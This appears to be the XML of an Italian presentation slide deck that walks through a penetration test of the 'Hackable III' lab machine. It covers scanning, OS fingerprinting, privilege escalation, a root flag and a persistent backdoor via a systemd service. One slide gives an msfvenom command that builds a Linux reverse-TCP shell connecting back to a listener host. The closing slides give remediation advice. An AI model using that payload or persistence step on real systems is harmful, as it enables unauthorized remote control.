          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1766887" y="2715733"/>
            <a:ext cx="5610225" cy="1948469"/>
            <a:chOff x="1766887" y="2715733"/>
            <a:chExt cx="5610225" cy="194846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F0185DB9-1386-9E07-FCF3-078C2F84D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518"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1766887" y="2715733"/>
              <a:ext cx="5610225" cy="14140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Google Shape;504;p34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B9A855D-8F6E-A13B-2D8D-4D8084EB8278}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2598736" y="4171283"/>
              <a:ext cx="3946525" cy="49291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Aft>
                  <a:spcPts val="1600"/>
                </a:spcAft>
              </a:pP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/var/www/html/.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backup_config.php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A319B2-A64A-C6D6-4443-E11F3E6CDF05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="3525203"/>
            <a:ext cx="2066750" cy="394490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9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Privilege escalation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root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C34D82-F3ED-A157-010C-E1142861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90" y="1102961"/>
            <a:ext cx="5453219" cy="1291507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6404F69-0125-5BD5-A5FD-C2B0F4DFED5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971506" y="2202024"/>
            <a:ext cx="794812" cy="192444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Contenedores con LXD/LXC — Plone site">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158B8EF3-11F2-D320-931F-5FBBEC5C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89" y="3021985"/>
            <a:ext cx="1075093" cy="9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pine Linux 常用命令 | 梨数码">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F5349A4-DA3B-BC85-5AB1-E163CD75D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30558" r="12727" b="30412"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4048449" y="2994006"/>
            <a:ext cx="2998234" cy="10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4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Privilege escalation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root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DC309C-8E86-4C96-DD32-585A9C5E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1" y="1020029"/>
            <a:ext cx="6100473" cy="7080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46040D6-DEDC-CB32-BBD6-3367355AA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13"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1802802" y="2252034"/>
            <a:ext cx="6951243" cy="8348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F05F242-510E-D3C4-B17F-1FB505E7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62" y="3361001"/>
            <a:ext cx="4705783" cy="1128121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Are There Any OS or Distro Alternatives to Kali-Linux? - Cyber Security ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C06DB3-6F83-4512-0551-5210CC96F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26" y="1020029"/>
            <a:ext cx="748791" cy="710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4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Privilege escalation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root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3B2620-4D10-8289-A131-A5F31867C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4" r="17540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5085184" y="349067"/>
            <a:ext cx="2313991" cy="4727077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FBCCB2AA-FD2F-83B9-BCCA-CC016B234213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700702F6-BC6C-40F4-D0C5-411EB4852EA0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1" name="Google Shape;1013;p53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839E7A55-4A71-250F-F209-B1FC6C6B7982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018;p53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DBFF968-B33B-B57A-7237-4BD534792E35}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1574100" y="1776748"/>
                <a:ext cx="26361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Flag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" name="Google Shape;1017;p53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D7FC22-BD1A-194D-3FCB-3723B5253E71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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mnt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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/root/root/root.txt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20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5275" y="1511559"/>
            <a:ext cx="3863100" cy="2995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Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ACCESS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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050" name="Picture 2" descr="Metasploit - Sabe o que é? - Pplware">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF42FF3-EFC0-9776-DDD0-AF601D53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689" y="2340517"/>
            <a:ext cx="2151678" cy="4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Elemento grafico 19" descr="Freccia: leggera curva con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04C382B3-D14A-198F-9F03-75D053FAD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7175" y="3042212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orta aperta con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81277B99-45E0-FB5F-A7C3-9C8A9E2D1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2775" y="3009122"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Elemento grafico 21" descr="Portatile con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4138041E-7F0F-8FB5-6C23-830C1B876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1575" y="3108392"/>
            <a:ext cx="848220" cy="84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3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Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>persistente</a:t>
            </a:r>
            <a:endParaRPr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9613AEB-FCCC-215B-E0FB-B7943DE07A1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="720050" y="1086547"/>
            <a:ext cx="3201501" cy="3245064"/>
            <a:chOff x="720050" y="1086547"/>
            <a:chExt cx="3201501" cy="3245064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75B5203-971D-8901-AADF-22E45796E329}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="720050" y="1086547"/>
              <a:ext cx="3201501" cy="3245064"/>
              <a:chOff x="1574100" y="1601486"/>
              <a:chExt cx="2636101" cy="3049500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Google Shape;1013;p53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9850B669-A074-037C-EBA6-FC72EDC3B2D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr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018;p53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2EA4E6-EDD5-B87B-FB34-6134230378E0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1574101" y="1776748"/>
                <a:ext cx="2636100" cy="784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Creazione script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5" name="Google Shape;1017;p53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3186755F-37EC-965E-0EDF-093CFC0DA407}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1101012" y="1710464"/>
              <a:ext cx="2603241" cy="1993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msfvenom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–a x86 –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platform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linux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–p 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linux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/x86/shell/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reverse_tcp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LHOST=10.0.2.14 LPORT=4444 –f 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elf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–o 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shell.elf</a:t>
              </a:r>
              <a:endPara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4C3DDB2-187D-D10D-2439-F706215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42" y="1086547"/>
            <a:ext cx="4774581" cy="1079031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, dispositivo, scuro&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45608A63-FF8B-6310-6ACF-2AEB1EE1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1750"/>
            <a:ext cx="3380105" cy="687705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 14" descr="apache-logo-4 - PNG - Download de Logotipos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC637B8-0AE2-AC0D-D234-E8E8CE99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52" y="3710576"/>
            <a:ext cx="1614487" cy="6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Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>persistente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9805CDB-5EFF-F971-6F4B-CD8CAF58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45" y="978469"/>
            <a:ext cx="2547257" cy="15045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E8CE2DB-E826-128D-6834-260C08270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1" b="68069"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="793102" y="997073"/>
            <a:ext cx="4064744" cy="12804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504;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186B6EDC-782F-2C49-881F-E1A951417538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5926457" y="2482989"/>
            <a:ext cx="1716832" cy="659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it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>startup_file.service</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Barlow" panose="00000500000000000000" pitchFamily="2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F4A9709-F495-2B25-3089-2FCDFF532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32396" y="3112391"/>
            <a:ext cx="7479207" cy="75403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1880C3E-221E-ECD6-09BC-A4FA1D98299B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511245" y="1794285"/>
            <a:ext cx="2175550" cy="22458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94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Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>persistente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F362CB-CCD3-9082-57CF-93E0C64F8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627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1330138" y="1183967"/>
            <a:ext cx="6483722" cy="1387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3F3D06-5D7C-FF0D-67C6-24A0E0A2C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49" y="2798987"/>
            <a:ext cx="6998099" cy="156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51E7D0-F7CA-BBAB-61F2-900F18C3B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39" r="31837" b="2179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193814" y="3993160"/>
            <a:ext cx="494381" cy="11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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723705" y="537375"/>
            <a:ext cx="3863100" cy="2995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Conclusioni</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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851" name="Google Shape;851;p50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992A2391-11D3-63F6-CAA3-C2535F65E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601499"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4431947" y="1451383"/>
          <a:ext cx="5404213" cy="3366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638;p39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E094A48-96ED-3D00-5C31-823A9DD533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2584174"/>
            <a:ext cx="4028981" cy="2142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400" dirty="0"/>
              <a:t>Numerose vulnerabilità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400" dirty="0"/>
              <a:t>Il sistema può essere compromesso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400" dirty="0"/>
              <a:t>Aggiornare versione Apache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400" dirty="0"/>
              <a:t>Eliminare il port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>knocking</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400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sz="1400" dirty="0"/>
              <a:t>Usare password sicure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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A17BFECF-6B51-523D-BC27-F6D3E5E0F464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6241588" y="1382409"/>
            <a:ext cx="1309587" cy="492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Vulnerabilità</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="793551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13;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBF70F1F-CB55-34E5-8770-F8B24D0D2223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770314" y="1410958"/>
            <a:ext cx="4900441" cy="232158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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043158" y="2132861"/>
            <a:ext cx="4464673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GRAZIE PER L’ATTENZIONE!</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Google Shape;54;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7A95662-8990-E8B9-63F0-2742DDB336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4" y="0"/>
            <a:ext cx="1078810" cy="10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D941218-B581-A501-112C-DE2B78D31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526" y="4083600"/>
            <a:ext cx="1059900" cy="1059900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610425" y="1939000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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5058675" y="1939000"/>
            <a:ext cx="3474900" cy="268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Introduzione</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5199025" y="2121271"/>
            <a:ext cx="3231900" cy="78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/>
              <a:t>Information gathering</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Google Shape;626;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731925" y="2130186"/>
            <a:ext cx="3231900" cy="78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/>
              <a:t>Target scoping</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Google Shape;9246;p69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5063158-6970-3851-8E9A-393798A0711D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="932422" y="3102571"/>
            <a:ext cx="834686" cy="695411"/>
            <a:chOff x="1958520" y="2302574"/>
            <a:chExt cx="359213" cy="327807"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent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5" name="Google Shape;9247;p69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B179651-0817-A725-B6FE-328BC3B631DF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48;p69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957707D6-9D90-74EC-583E-42A49E6D4FB4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49;p69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D212520-2936-10C1-FFA1-B24A26C429F9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27;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6061310-C69D-B79F-97DF-789BF5DD89F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654573" y="4256963"/>
            <a:ext cx="1387356" cy="3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Hackable III</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Google Shape;11614;p73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B53610-4989-5CF2-8DEE-1AB255F066BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2868045" y="3046362"/>
            <a:ext cx="748046" cy="729143"/>
            <a:chOff x="4017435" y="1499912"/>
            <a:chExt cx="315091" cy="359397"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill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10" name="Google Shape;11615;p73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D3C8C7-2B6C-C016-DD49-54BB5FEF7D7C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616;p73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D797A40A-E805-FE28-33AB-2208E31254FE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27;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE206BE-AA5C-F90D-574D-EFC2C1F5A0B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2254715" y="4242289"/>
            <a:ext cx="1975609" cy="3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Testing black-box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Elemento grafico 15" descr="Pinguino contorno">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE4DD1A-FB44-E182-82F6-067FDCE7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3412" y="2989370"/>
            <a:ext cx="843125" cy="84312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19" name="Google Shape;627;p38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1010B7D4-C18F-BEB1-B5EE-C110EA59798A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808320" y="4256963"/>
            <a:ext cx="1975609" cy="3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OS Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17472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/>
      <p:bldP spid="622" grpId="0" animBg="1"/>
      <p:bldP spid="625" grpId="0" build="p"/>
      <p:bldP spid="626" grpId="0" build="p"/>
      <p:bldP spid="8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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725275" y="1560900"/>
            <a:ext cx="3268081" cy="20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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DISCOVERY</a:t>
            </a:r>
            <a:endParaRPr sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr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7A5965-65DB-E959-A476-B1E83D2B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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4220114" y="952809"/>
            <a:ext cx="4447161" cy="2697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90565ABE-5416-71C1-F270-B502382E42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02128" y="3669197"/>
            <a:ext cx="1083131" cy="492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-sn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C7844B8F-E7AE-228B-C23D-25C3471B728E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212289" y="2708354"/>
            <a:ext cx="4198611" cy="499191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OS Fingerprinting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B4E83A-9A91-AD8A-AD2C-2EFD7C0AD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672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4053739" y="1590151"/>
            <a:ext cx="4683622" cy="1643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2064900" y="1776748"/>
                <a:ext cx="16545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Attivo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nmap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-O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86A891D-0708-2B08-63AC-DBEAFDD1F729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053739" y="2928939"/>
            <a:ext cx="1761274" cy="171450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7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OS Fingerprinting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2064900" y="1776748"/>
                <a:ext cx="1654500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Passivo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p0f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0F95F3B-7BBD-713F-8495-F41A3015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50" y="1094837"/>
            <a:ext cx="3987800" cy="156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E6F6D2-9EB9-95B7-E138-15DA7779C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8" r="43760" b="18741"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4352750" y="3233260"/>
            <a:ext cx="4014169" cy="1092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8771C82-F979-8C31-8FB5-2C6CDC17B64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352751" y="1685925"/>
            <a:ext cx="1183656" cy="192818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4F2A773-C9C6-D573-7894-6CA3E43822F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352750" y="3836194"/>
            <a:ext cx="1762299" cy="212469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6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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725275" y="1721644"/>
            <a:ext cx="4189625" cy="24690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Enumerating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e Port scanning</a:t>
            </a:r>
            <a:endParaRPr sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Google Shape;603;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2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sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;504;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
